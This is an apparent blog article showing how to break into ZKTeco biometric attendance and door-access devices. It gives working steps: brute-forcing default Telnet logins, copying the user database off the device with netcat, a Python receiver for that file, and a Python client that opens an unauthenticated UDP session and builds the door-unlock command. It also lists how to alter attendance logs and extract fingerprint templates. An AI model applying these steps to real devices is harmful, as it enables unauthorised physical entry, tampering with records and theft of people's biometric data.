ZKTeco is a vendor of biometric devices for fingerprint, facial and iris recognition. The vendor is well known, particularly in Middle Eastern countries, where its devices are commonly found in organizations.
This article demonstrates easy ways to break into some ZKTeco machines. Please note that this article is for educational purposes only, and the author bears no responsibility if it is used for any illegal or unethical activity.
(i) Exploiting via Telnet Access:
Penetration testing was done on two ZKTeco models, the uFace800/ID and the iClock880-H/ID. The embedded Linux platforms in these devices are ZEM220, ZEM600 and ZEM800. The same method is believed to work on other models as well.
Telnet is enabled on these machines and the default passwords have not been changed; we gained access by brute-forcing the login with a wordlist of probable passwords. Confirm that TCP port 23 is open (for example with a port scan) before trying.
Lists of default passwords are easy to find on the Internet.
Once logged in, first locate the database files with the command:
find / -name "*.db"
This searches the whole filesystem for files with the .db extension, which on these devices is the SQLite database (the quotes stop the shell from expanding the pattern before find sees it).
Then change into that directory and transfer the file to your PC with the tool netcat (nc).
On the sending side (the ZEM220 device), the command is:
nc <ip-address> 9999 < ZKDB.db
where <ip-address> is the IP of the PC that will receive the file. The PC must already be listening on port 9999 before the device sends, which is done with the following command on the PC:
nc -l -p 9999 > ZKDB
where -l tells nc to listen for the incoming connection and -p sets the port (this is the traditional netcat syntax; the OpenBSD variant takes nc -l 9999 instead).
Any port can be used; 9999 is not mandatory, as long as both sides use the same one.
After the transfer, the database can be opened with sqlite3 or any other SQLite viewer. nc gives no indication of a truncated transfer, so compare the size of the received file with the original (ls -l on both sides) before trusting it.
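As an added example (not part of the original article), here is the receiving side of the transfer written in Python instead of nc. It listens once, streams whatever the device sends to disk, returns the byte count and a SHA-256 so the copy can be checked, and then lists the tables in the received SQLite file. The port, the output filename and the script name in the usage line are assumptions; the sending side is still the nc command on the device shown above.

```python
import hashlib
import socket
import sqlite3
import sys


def open_listener(port=9999, bind_addr="0.0.0.0"):
    """Bind a TCP listener; the counterpart of `nc -l -p PORT`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)
    return srv


def receive_file(listener, dest_path, timeout=120.0):
    """Accept one connection, stream everything the sender writes into
    `dest_path`, and return (bytes_received, sha256_hex). The size and hash
    are what you compare against the copy still on the device; a plain nc
    transfer gives no indication that it was truncated."""
    listener.settimeout(timeout)
    try:
        conn, _peer = listener.accept()
    finally:
        listener.close()
    digest = hashlib.sha256()
    total = 0
    with conn, open(dest_path, "wb") as out:
        conn.settimeout(timeout)
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # sender closed the connection: EOF
                break
            out.write(chunk)
            digest.update(chunk)
            total += len(chunk)
    return total, digest.hexdigest()


def describe_sqlite(path):
    """Return {table_name: row_count} for every user table in the received
    file. Raises sqlite3.DatabaseError if the file is not a SQLite database,
    so a wrong or damaged file shows up here rather than later."""
    conn = sqlite3.connect(path)
    try:
        names = [row[0] for row in conn.execute(
            "SELECT name FROM sqlite_master "
            "WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
        counts = {}
        for name in names:
            # table names cannot be bound as parameters; quote them instead
            quoted = '"%s"' % name.replace('"', '""')
            counts[name] = conn.execute("SELECT COUNT(*) FROM " + quoted).fetchone()[0]
        return counts
    finally:
        conn.close()


if __name__ == "__main__":
    # Hypothetical usage: python recv_db.py [port] [output-file]
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 9999
    dest = sys.argv[2] if len(sys.argv) > 2 else "ZKDB.db"
    print("listening on %d, now run the nc command on the device" % port)
    size, sha = receive_file(open_listener(port), dest)
    print("received %d bytes, sha256 %s" % (size, sha))
    print("tables:", describe_sqlite(dest))
```

Start it on the PC first, then run the nc command on the device; when the device closes the connection the script prints the size, the hash and the table names with their row counts.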
(ii) Gaining Access through Improper Authentication:
UDP port 4370 on the ZK5000-ZK9000 range allows anyone to connect to the device without any authentication. Custom commands can be crafted and sent to the device through UDP port 4370 to download information; this can be confirmed with the tool Scapy on Linux. Alternatively, the vendor's own proprietary software uses this port to connect to the device without a password. This was confirmed with the software "ZKTeco 5.0", although other versions of this software can also be used to exploit the vulnerability and were confirmed by the author.
Note that this method can also be used to open doors that normally require biometric identification first.
The resulting screen shows one device connected, without any password having been provided.
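The packet format behind this unauthenticated access, as an added example that is not from the original article or from ZKTeco: it builds the 8-byte header (command, checksum, session id, reply id, all 16-bit little-endian) with its one's-complement checksum, parses the device's reply, and classifies the answer to a bare CMD_CONNECT. The command numbers and the checksum algorithm follow the community-documented ZK protocol used by open-source clients such as pyzk and are stated here as an assumption to verify against a capture from your own device. The device address is taken from the command line, and `probe` only opens and then closes a session, so it changes nothing on the device.

```python
import socket
import struct
import sys

# Command numbers from the community-documented ZK UDP protocol
# (assumption: confirm against a capture from your own device).
CMD_CONNECT = 1000      # open a session; the packet carries no credential
CMD_EXIT = 1001         # close the session
CMD_UNLOCK = 31         # drive the lock relay; data = duration in tenths of a second
CMD_AUTH = 1102         # comm-key authentication, only required when a key is set
CMD_ACK_OK = 2000
CMD_ACK_ERROR = 2001
CMD_ACK_UNAUTH = 2005   # answer to CMD_CONNECT when a comm key is configured
ZK_PORT = 4370


def checksum16(payload):
    """One's-complement sum of the 16-bit little-endian words of `payload`,
    i.e. the 8-byte header with its checksum field zeroed followed by the
    data. An odd trailing byte is padded with 0x00; carries are folded in."""
    if len(payload) % 2:
        payload += b"\x00"
    total = sum(struct.unpack("<%dH" % (len(payload) // 2), payload))
    while total > 0xFFFF:
        total = (total & 0xFFFF) + (total >> 16)
    return total ^ 0xFFFF


def build_packet(command, session_id=0, reply_id=0, data=b""):
    """Header: <command:u16><checksum:u16><session_id:u16><reply_id:u16>,
    little-endian, followed by the command data."""
    header = struct.pack("<4H", command, 0, session_id, reply_id)
    chk = checksum16(header + data)
    return struct.pack("<4H", command, chk, session_id, reply_id) + data


def parse_packet(pkt):
    """Split a raw datagram into (command, session_id, reply_id, data, checksum_ok)."""
    if len(pkt) < 8:
        raise ValueError("datagram shorter than the 8-byte header")
    command, chk, session_id, reply_id = struct.unpack("<4H", pkt[:8])
    checksum_ok = checksum16(pkt[:2] + b"\x00\x00" + pkt[4:]) == chk
    return command, session_id, reply_id, pkt[8:], checksum_ok


def classify_reply(command):
    """Map the command in the device's answer to CMD_CONNECT onto a verdict."""
    if command == CMD_ACK_OK:
        return "open: session granted without any credential"
    if command == CMD_ACK_UNAUTH:
        return "comm key set: device demands CMD_AUTH before other commands"
    if command == CMD_ACK_ERROR:
        return "error: device refused the connect"
    return "unexpected reply command %d" % command


def probe(host, port=ZK_PORT, timeout=3.0):
    """Send one unauthenticated CMD_CONNECT and report how the device answers.
    Returns (verdict, session_id) and closes a granted session with CMD_EXIT."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_packet(CMD_CONNECT), (host, port))
        try:
            raw, _ = sock.recvfrom(4096)
        except socket.timeout:
            return "no reply (port closed, filtered, or not a ZK device)", None
        command, session_id, reply_id, _data, chk_ok = parse_packet(raw)
        verdict = classify_reply(command)
        if not chk_ok:
            verdict += " (reply checksum did not verify)"
        if command == CMD_ACK_OK:
            # In the same session an attacker could now send CMD_UNLOCK or the
            # user/log commands; this probe only closes the session cleanly.
            nxt = (reply_id + 1) & 0xFFFF
            sock.sendto(build_packet(CMD_EXIT, session_id, nxt), (host, port))
        return verdict, session_id


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python zk_probe.py <device-ip>")   # hypothetical script name
    print(*probe(sys.argv[1]))
```

A device that answers CMD_ACK_OK to the bare connect is exposed exactly as described above. One that answers CMD_ACK_UNAUTH has a communication key configured and rejects further commands until a CMD_AUTH carrying that key is sent; checking for that key on every device is the practical hardening step this section implies. Once a session is granted, `build_packet(CMD_UNLOCK, session_id, reply_id, struct.pack("<I", 30))` is the door-open request (30 tenths of a second) that the note about opening gates refers to, under the same assumption about the command encoding.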
The two methods described in this article allow us to:
· Add a user
· Delete a user
· Increase or decrease the privileges of a user
· Modify the log sheet to mark someone absent or present on a given day
· Change the time of an attendance record
· Delete all the records
The fingerprint templates of the users registered on the device can be extracted from this database, and an extracted template can be misused against that user in various ways.
Author: Shameel Uddin (https://web.facebook.com/shameelisuddin)